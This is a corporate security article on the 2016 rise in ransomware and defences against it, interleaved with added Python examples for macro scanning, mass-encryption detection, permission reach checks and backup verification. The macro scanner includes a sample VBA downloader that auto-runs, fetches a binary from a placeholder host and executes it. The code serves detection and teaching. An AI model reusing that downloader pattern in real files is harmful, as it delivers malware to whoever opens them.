At the end of 2015, many cyber security commentators predicted that ransomware attacks would continue to rise during 2016. But few could have expected just how dramatic that increase would actually turn out to be.
A new study found that 39% of UK companies were victims of a ransomware attack in the last 12 months – and this was below the global average of 48%.
The same study estimated that IT staff lost nearly a full working week (33 hours) to restoring encrypted data from backups. What’s more, it isn’t just large organisations being targeted: a separate report from Kaspersky Lab found that small businesses faced eight times more ransomware attacks in the third quarter of 2016 than in the same period of the previous year.
One of the key reasons for the growth in attack volumes is simply this: ransomware is proven to work. Also, for the criminals behind the attacks, it’s a numbers game: the more businesses they infect, the more ransoms they can demand and potentially have paid.
The way ransomware is delivered has also evolved, to help infections evade conventional security controls such as signature-based antivirus software.
For example, recent variants use a two-stage infection process. The first stage is a phishing email with an attachment harbouring a macro; if the user opens the document and the macro runs, it contacts the attacker’s remote server and downloads the ransomware as the second stage.
In effect, the user is ‘inviting’ the ransomware onto their machine, which makes this vector particularly difficult to block: the attachment carries only a downloader rather than the ransomware itself, and the macro is often purposely designed to evade the majority of anti-virus software and current detection techniques.
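To make the first stage concrete, here is an added example in Python (not code from the article or from SureCloud) that scores VBA macro source for the three things a staged downloader needs: an auto-execute entry point, a network call, and a way to run what it fetched. It first undoes the cheap obfuscation that defeats naive keyword matching (line continuations, Chr() encoding and string splitting with &). The sample macro, the keyword lists and the verdict rule are constructed for this example.

```python
import re

# Indicator families a two-stage macro downloader needs. The keyword lists are
# illustrative assumptions for this example, not a vendor signature set.
AUTO_EXEC = ("AutoOpen", "Document_Open", "Workbook_Open", "Auto_Open", "AutoExec")
NETWORK = ("URLDownloadToFile", "MSXML2.XMLHTTP", "MSXML2.ServerXMLHTTP",
           "WinHttp.WinHttpRequest", "ADODB.Stream")
EXECUTE = ("WScript.Shell", "Shell.Application", "Shell(", "CreateObject(", "Environ(")
OBFUSCATION = ("Chr(", "StrReverse(", "Xor ")


def normalise(vba: str) -> str:
    """Undo cheap string-splitting tricks used to defeat keyword matching:
    ' _' line continuations, Chr(n) character encoding and "a" & "b" joins."""
    text = re.sub(r"[ \t]_\r?\n\s*", " ", vba)                       # join continued lines
    text = re.sub(r"Chr\((\d+)\)",
                  lambda m: '"%s"' % chr(int(m.group(1)) & 0xFF), text)  # Chr(87) -> "W"
    text = re.sub(r'"\s*&\s*"', "", text)                            # "WScr" & "ipt" -> "WScript"
    return text


def analyse_macro(vba: str) -> dict:
    """Return the indicators matched per family plus a verdict. The verdict rule
    (auto-exec AND network AND execute => stage-one downloader) is this
    example's heuristic, not a standard."""
    norm = normalise(vba).lower()
    hits = {
        "auto_exec": [k for k in AUTO_EXEC if k.lower() in norm],
        "network": [k for k in NETWORK if k.lower() in norm],
        "execute": [k for k in EXECUTE if k.lower() in norm],
        # obfuscation is scored on the raw text, because normalise() strips it
        "obfuscation": [k for k in OBFUSCATION if k.lower() in vba.lower()],
    }
    downloader = all(hits[f] for f in ("auto_exec", "network", "execute"))
    hits["verdict"] = "stage-one downloader" if downloader else "no downloader pattern"
    return hits


# Constructed sample modelled on the downloader pattern described in the text.
# The host is a reserved .invalid name and the file names are made up.
SAMPLE_MACRO = r'''Sub AutoOpen()
    Dim h As Object, s As Object
    Set h = CreateObject("MSX" & "ML2.XMLHTTP")
    h.Open "GET", "http://example.invalid/update.bin", False
    h.Send
    Set s = CreateObject("ADODB.Stream")
    s.Open: s.Type = 1: s.Write h.responseBody
    s.SaveToFile Environ("TEMP") & "\svc.exe", 2
    CreateObject("WScr" & _
        "ipt.Shell").Run Environ("TEMP") & "\svc.exe", 0
End Sub
'''

# Constructed benign macro: no entry point, no network, no execution.
BENIGN_MACRO = "Sub FormatReport()\n    Selection.Font.Bold = True\nEnd Sub\n"

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, analyse_macro(src))
```

The split-string and line-continuation handling matters more than the keyword list: a macro that spells "WScript.Shell" as two literals joined with & is the same macro, and a scanner that only looks at the raw text will miss it.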
One of the challenges in mitigating ransomware is how quickly it can encrypt large numbers of files, rendering them inaccessible and stopping the normal flow of work.
The damage is often already done by the time the infection is detected. Organisations are then left to remove the infection and restore files from backups.
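The window between the first encrypted file and detection is where behavioural controls earn their keep. The following is an added example, not part of the original article or SureCloud’s service: a small Python detector run over a constructed stream of file events. It alerts when any process touches a planted canary file, and when one process modifies many distinct files in a short window with most of those modifications changing the file extension. The process names, paths, canary naming convention and thresholds are assumptions for the example.

```python
import os
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import List, Optional, Tuple

CANARY_MARK = ".canary_"   # assumed naming convention for planted decoy files


@dataclass
class FileEvent:
    ts: float                       # seconds
    process: str
    op: str                         # "write" or "rename"
    path: str
    new_path: Optional[str] = None  # target name for renames


def detect(events: List[FileEvent], window: float = 10.0, min_files: int = 20,
           min_ext_change: float = 0.5) -> List[Tuple]:
    """Two rules. (1) Any touch of a canary file alerts immediately.
    (2) One process touching >= min_files distinct files inside `window`
    seconds, where >= min_ext_change of those touches changed the file
    extension, alerts once. Thresholds are assumptions to tune per site."""
    alerts = []
    recent = defaultdict(deque)   # process -> deque of (ts, path, ext_changed)
    flagged = set()
    for ev in sorted(events, key=lambda e: e.ts):
        names = [os.path.basename(ev.path)]
        if ev.new_path:
            names.append(os.path.basename(ev.new_path))
        if any(CANARY_MARK in n for n in names):
            alerts.append(("canary", ev.process, ev.ts, ev.path))
        ext_changed = (ev.op == "rename" and ev.new_path is not None and
                       os.path.splitext(ev.path)[1] != os.path.splitext(ev.new_path)[1])
        q = recent[ev.process]
        q.append((ev.ts, ev.path, ext_changed))
        while q and q[0][0] < ev.ts - window:     # drop events outside the window
            q.popleft()
        distinct = {p for _, p, _ in q}
        if ev.process not in flagged and len(distinct) >= min_files:
            ratio = sum(1 for _, _, c in q if c) / len(q)
            if ratio >= min_ext_change:
                alerts.append(("mass-encrypt", ev.process, ev.ts, len(distinct)))
                flagged.add(ev.process)
    return alerts


def build_sample_events() -> List[FileEvent]:
    """Constructed event stream: a downloaded payload renaming documents to
    .locked, a nightly backup job writing slowly, and a user bulk-moving
    files without changing their extension."""
    ev = [FileEvent(99.5, "svc.exe", "write", "/srv/share/.canary_0001.txt")]
    ev += [FileEvent(100 + i * 0.25, "svc.exe", "rename",
                     f"/srv/share/doc{i}.docx", f"/srv/share/doc{i}.docx.locked")
           for i in range(30)]
    ev += [FileEvent(200 + i * 3.0, "backup.exe", "write", f"/srv/share/doc{i}.docx")
           for i in range(25)]
    ev += [FileEvent(300 + i * 0.1, "tidy.exe", "rename",
                     f"/srv/share/old{i}.xlsx", f"/srv/share/2015/old{i}.xlsx")
           for i in range(25)]
    return ev


if __name__ == "__main__":
    for alert in detect(build_sample_events()):
        print(alert)
```

The extension-change ratio is what separates the encryptor from the legitimate bulk rename, and the canary rule fires well before the volume rule does; both are the kind of "advanced behavioural analysis checks" a harmless simulation should be able to trip.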
Understanding where the risk of ransomware lies
The biggest risk within a network is that the ransomware runs with the same access to files and data as the person using the infected machine, including any network shares that user can write to.
This is especially dangerous if an executive is successfully targeted, as such highly privileged users often have access to vast quantities of company data.
Another major ransomware risk is a social one. If an employee is given the option to pay and conceal the fact that they accidentally triggered an infection, they may do so out of fear of losing their job.
However, the malware can often remain on the computer after the ransom is paid and act as a remote access tool (RAT), capturing screenshots, keystrokes and network traffic and sending files and passwords back to the attackers to sell or to use in further attacks against the organisation.
But while the task of protecting against ransomware may seem insurmountable there are steps organisations can take to defend against the potential impact of a ransomware attack.
Practice makes perfect
First and foremost, organisations need to bear in mind that practice makes perfect, and that maxim applies as much to ransomware preparation as to any other facet of life.
As we saw earlier, with 39% of UK organisations hit in the last 12 months, it is a case of when, not if, a business is attacked with ransomware.
To hone their readiness, organisations should run simulated ransomware attacks that mimic a real threat without any of the danger.
As an example, SureCloud’s Simulated Ransomware Service triggers two main actions if a machine is successfully infected.
First, the simulated ransomware performs harmless actions designed to trigger and test advanced behavioural analysis checks. It then displays a typical ransomware message to demonstrate and evidence the infection, which also tests whether an employee attempts to make a payment from a compromised device.
Simulating attacks such as these gives businesses visibility of how likely they are to be successfully compromised via a targeted and focused attack, and identifies where current controls are ineffective at preventing and/or detecting one.
Furthermore, they will be able to see what could be encrypted from various access points should a real attack occur. This in turn allows the organisation to deploy more restrictive permissions, along with improving user awareness and training, to help with early detection and to stop the spread in the event of a real attack.
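One way to get that “what could be encrypted” view without running anything destructive is a read-only reach assessment. The following added example (not the article’s or SureCloud’s code) walks a set of directories as the current account and counts the target-type files it could overwrite in place or replace via a writable parent directory, without opening any file for writing. The target extension list and the demo tree are assumptions constructed for the example.

```python
import os
import tempfile
from collections import Counter

# Extensions a typical encryptor goes after; an assumed list for this example.
TARGET_EXT = {".docx", ".xlsx", ".pptx", ".pdf", ".jpg", ".txt", ".db"}


def assess_reach(roots, exts=TARGET_EXT):
    """Read-only estimate of what the current account could encrypt. A file is
    counted as exposed if it can be written in place or if its directory is
    writable (delete-and-replace, which is how many encryptors work).
    Nothing is opened for writing and symlinks are not followed."""
    exposed, protected, by_dir = [], [], Counter()
    for root in roots:
        for dirpath, _, filenames in os.walk(root):
            dir_writable = os.access(dirpath, os.W_OK)
            for name in filenames:
                if os.path.splitext(name)[1].lower() not in exts:
                    continue
                path = os.path.join(dirpath, name)
                if dir_writable or os.access(path, os.W_OK):
                    exposed.append(path)
                    by_dir[dirpath] += 1
                else:
                    protected.append(path)
    return {"exposed": sorted(exposed), "protected": sorted(protected),
            "by_dir": by_dir.most_common()}


def build_demo_tree():
    """Constructed tree: a user's home folder, a read-only finance share and an
    archive. Paths and contents are made up for the example."""
    base = tempfile.mkdtemp(prefix="reach-demo-")
    layout = {"home/report.docx": b"Q3 numbers", "home/photo.jpg": b"\xff\xd8",
              "home/tool.exe": b"MZ", "finance/ledger.xlsx": b"PK",
              "archive/2015.pdf": b"%PDF"}
    for rel, data in layout.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    os.chmod(os.path.join(base, "finance", "ledger.xlsx"), 0o444)
    os.chmod(os.path.join(base, "finance"), 0o555)  # blocks delete-and-replace too
    return base


if __name__ == "__main__":
    report = assess_reach([build_demo_tree()])
    print(f"{len(report['exposed'])} exposed, {len(report['protected'])} protected")
    for directory, count in report["by_dir"]:
        print(f"  {count:4d}  {directory}")
```

Run under an ordinary user account, the finance file is the only one reported as protected; the directory-writable check is the important one, because a read-only file in a writable folder is still replaceable. Run as an administrator or root, everything is exposed, which is precisely the point the text makes about privileged users.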
Prevention is more effective than remediation
In addition to practising how to respond in the event of a ransomware attack successfully infiltrating the network, there are also a number of measures businesses can take to reduce the likelihood of ransomware making its way onto the corporate network. Let’s take a look at these steps in turn.
1. Security controls
While some forms of ransomware can circumvent traditional security controls, these controls nonetheless remain a critical part of an organisation’s defences.
These should include email filtering, web filtering and a corporate anti-virus solution that includes ransomware detection capabilities.
2. Have robust back-up in place
Regularly back up files and data to an offline location (such as tape) that cannot be touched by the ransomware should an infection occur.
Organisations that do this put themselves in an excellent position to mitigate the impact of an attack: infected devices can be removed from the network, wiped, and their data restored in full.
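A backup is only a mitigation if the restore has been proven against a known-good state; a backup taken after the infection simply preserves the encrypted files. The following added example (not from the article) keeps a SHA-256 manifest taken while the data was clean, then checks a tree against it, distinguishing files that changed, went missing or newly appeared. The directory layout and file contents are constructed for the example.

```python
import hashlib
import os
import shutil
import tempfile


def sha256_file(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def make_manifest(root):
    """Relative path -> sha256 for every regular file under root (symlinks skipped)."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            manifest[os.path.relpath(path, root)] = sha256_file(path)
    return manifest


def verify_restore(tree_root, manifest):
    """Compare a tree against a known-good manifest. 'changed' catches files
    encrypted in place, 'missing' plus 'unexpected' catch rename-and-encrypt."""
    result = {"ok": [], "changed": [], "missing": [], "unexpected": []}
    seen = make_manifest(tree_root)
    for rel, digest in manifest.items():
        if rel not in seen:
            result["missing"].append(rel)
        elif seen[rel] != digest:
            result["changed"].append(rel)
        else:
            result["ok"].append(rel)
    result["unexpected"] = sorted(set(seen) - set(manifest))
    return result


def demo():
    """Constructed scenario: clean data, an offline copy, a simulated
    infection, then a verified restore from the copy."""
    base = tempfile.mkdtemp(prefix="restore-demo-")
    live = os.path.join(base, "live")
    os.makedirs(live)
    for name, data in {"a.docx": b"alpha", "b.xlsx": b"beta", "c.pdf": b"gamma"}.items():
        with open(os.path.join(live, name), "wb") as f:
            f.write(data)
    good = make_manifest(live)                       # taken while the data was clean
    backup = os.path.join(base, "backup")
    shutil.copytree(live, backup)                    # stands in for the offline copy
    # simulated infection: b.xlsx renamed and overwritten, c.pdf overwritten in place
    os.replace(os.path.join(live, "b.xlsx"), os.path.join(live, "b.xlsx.locked"))
    with open(os.path.join(live, "b.xlsx.locked"), "wb") as f:
        f.write(os.urandom(16))
    with open(os.path.join(live, "c.pdf"), "wb") as f:
        f.write(os.urandom(16))
    post_incident = verify_restore(live, good)       # a backup taken now inherits this
    restored = os.path.join(base, "restored")
    shutil.copytree(backup, restored)
    return post_incident, verify_restore(restored, good)


if __name__ == "__main__":
    after_infection, after_restore = demo()
    print("live tree after infection:", after_infection)
    print("restored from offline copy:", after_restore)
```

The manifest has to be stored with the offline copy, not on the live file server, or the ransomware will have the same access to it as to everything else the user can write.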
3. Staff education and training
This is absolutely critical within organisations of all sizes to ensure that knowledge of attacks is shared.
Employees can be taught to watch out for the tell-tale signs of a potential ransomware infection, whatever the delivery mechanism. A simulated, targeted attack against your own organisation aids this massively.
4. Never pay the ransom
Under no circumstances should the ransom be paid. Paying marks you or the organisation as a target for wider attacks, and there is absolutely no guarantee that your files will actually be decrypted. After all, would you rely on a criminal’s promise?
With ransomware attacks only set to increase in volume in 2017, it is critical that organisations take steps to defend against this insidious attack vector. After all, they can ill afford to add ‘fortune’ to the growing list of threats that could hold them hostage in the year ahead.
Sourced by Luke Potter, security practice director at SureCloud